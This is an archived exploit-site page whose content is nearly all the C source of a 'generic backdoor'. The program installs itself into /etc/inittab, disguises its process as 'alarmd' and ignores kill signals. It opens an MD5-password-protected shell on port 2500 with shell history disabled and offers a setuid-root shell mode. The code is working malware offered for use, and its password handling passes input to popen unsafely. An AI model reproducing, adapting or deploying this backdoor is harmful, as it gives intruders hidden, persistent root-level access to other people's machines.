Simple generic backdoor protected by a password encrypted with an MD5 hash. Gets added into inittab.
e882134c2334e44c8578e2e5edbc6cf3a3e29bd4f6d910f9a7118cca31ac094f/* simple generic backdoor protected by a password encrypted with MD5
* it can also give you root privileges also protected by a password encrypted with MD5
* greets to ^sq,UnPlugged,houdini,Angelboy and all my friends
* special thanks to ins1der and Lecsi for helping me when i needed and answering my questions
* for suggestion or some other stuff skilla@myway.com
*/
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BANNER "w0rd:"
#define MSG "Die bitch"
#define NOTE "All commands must end with a ;\n"
#define ROOT_PWD "c2ec25302de6c6ab729dbca78b9ec9ce" // 0wned
#define ROOTME_PWD "f291caaa8226b6ccbceb9ac54ef3c03c" // w00t
#define INIT_FILE "/etc/inittab"
#define HOME_DIR "/"
#define HIDE "alarmd"
#define PORT 2500
#define BACKLOG 3
short int login(int fd);
void install(char *argv);
void usage(char *argv);
void rootme(char *argv,char *opt);
void backdoor(char *argv);
void child(int fd,int nfd);
char *shell[]={"/bin/sh",NULL};
char *env[]={"HISTFILE=/dev/null",NULL};
short int login(int fd)
{
FILE *pipe;
int i;
char md5pwd[36],com[1024],pwd[50];
memset(&md5pwd,'\0',sizeof(md5pwd));
memset(&com,'\0',sizeof(com));
memset(&pwd,'\0',sizeof(pwd));
if ((send(fd,BANNER,sizeof(BANNER),0))==-1)
{
perror("send()");
exit(0);
}
if ((recv(fd,pwd,sizeof(pwd),0))==-1)
{
perror("recv()");
exit(0);
}
for (i=0;i<strlen(pwd);i++)
switch(pwd[i])
{
case '!':
case ';':
case '&':
case '>':
case '`':
case '\r':
case '\n':
pwd[i]='\0';
break;
}
snprintf(com,sizeof(com),"/bin/echo -n %s|/usr/bin/md5sum",pwd);
if ((pipe=popen(com,"r"))==NULL)
{
perror("pipe()");
exit(0);
}
fread(md5pwd,32,1,pipe);
pclose(pipe);
if (!strcmp(ROOT_PWD,md5pwd))
{
if ((send(fd,NOTE,sizeof(NOTE),0))==-1)
{
perror("send()");
exit(0);
}
return 1;
}
else
return 2;
}
void install(char *argv)
{
FILE *init;
int i;
char loc[60],ini[100];
memset(&ini,'\0',sizeof(ini));
memset(&loc,'\0',sizeof(loc));
getcwd(loc,sizeof(loc));
for (i=1;i<strlen(argv);i++)
argv[i-1]=argv[i];
argv[i-1]='\0';
strncat(loc,argv,strlen(argv));
strncat(ini,"bf:23:once:",11);
strncat(ini,loc,strlen(loc));
strncat(ini," -s",3);
if ((init=fopen(INIT_FILE,"a"))==NULL)
{
perror("open()");
exit(0);
}
fprintf(init,"\n%s",ini);
fclose(init);
exit(0);
}
void usage(char *argv)
{
fprintf(stdout,"Generic backdoor by sk\n");
fprintf(stdout,"Usage:%s\n\t",argv);
fprintf(stdout,"-i:install\n\t");
fprintf(stdout,"-r <password>:give root privileges\n\t");
fprintf(stdout,"-s:start\n");
fprintf(stdout,"skilla@myway.com\n");
exit(0);
}
void rootme(char *argv,char *opt)
{
FILE *pipe;
char com[1024],md5pwd[36];
memset(&com,'\0',sizeof(com));
memset(&md5pwd,'\0',sizeof(md5pwd));
snprintf(com,sizeof(com),"/bin/echo -n %s|/usr/bin/md5sum",optarg);
if ((pipe=popen(com,"r"))==NULL)
{
perror("pipe()");
exit(0);
}
fread(md5pwd,32,1,pipe);
pclose(pipe);
if (!strcmp(ROOTME_PWD,md5pwd))
{
setuid(0);
setgid(0);
execve(shell[0],shell,env);
}
else
printf("%s is out of order",argv);
exit(0);
}
void child(int fd,int nfd)
{
short int res;
close(fd);
res=login(nfd);
if (res==1)
{
dup2(nfd,0);
dup2(nfd,1);
dup2(nfd,2);
chdir(HOME_DIR);
execve(shell[0],shell,env);
}
else
exit(0);
}
void backdoor(char *argv)
{
int fd,nfd;
struct sockaddr_in serv;
struct sockaddr_in cli;
signal(SIGCHLD,SIG_IGN);
signal(SIGINT,SIG_IGN);
signal(SIGKILL,SIG_IGN);
signal(SIGHUP,SIG_IGN);
signal(SIGTERM,SIG_IGN);
if (fork())
exit(0);
if ((fd=socket(AF_INET,SOCK_STREAM,0))==-1)
{
perror("socket()");
exit(0);
}
serv.sin_family=AF_INET;
serv.sin_port=htons(PORT);
serv.sin_addr.s_addr=INADDR_ANY;
memset(&(serv.sin_zero),'\0',8);
if ((bind(fd,(struct sockaddr *)&serv,sizeof(struct sockaddr_in)))==-1)
{
perror("bind()");
exit(0);
}
if ((listen(fd,BACKLOG))==-1)
{
perror("listen()");
exit(0);
}
for (;;)
{
int sin_size=sizeof(struct sockaddr_in);
if ((nfd=accept(fd,(struct sockaddr *)&cli,&sin_size))==-1)
{
perror("accept()");
exit(0);
}
switch(fork())
{
case -1:perror("fork()");
exit(0);
case 0:child(fd,nfd);
default:close(nfd);
wait(NULL);
}
}
}
int main(int argc,char *argv[])
{
int op;
char opt[4]="isr:";
op=getopt(argc,argv,opt);
if (argc>1 && argv[1][1]=='s')
{
memset(argv[1],'\0',strlen(argv[1]));
memset(argv[0],'\0',strlen(argv[0]));
strcpy(argv[0],HIDE);
}
switch (op)
{
case 'i':install(argv[0]);
break;
case 'r':rootme(argv[0],optarg);
break;
case 's':backdoor(argv[0]);
break;
default:usage(argv[0]);
}
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed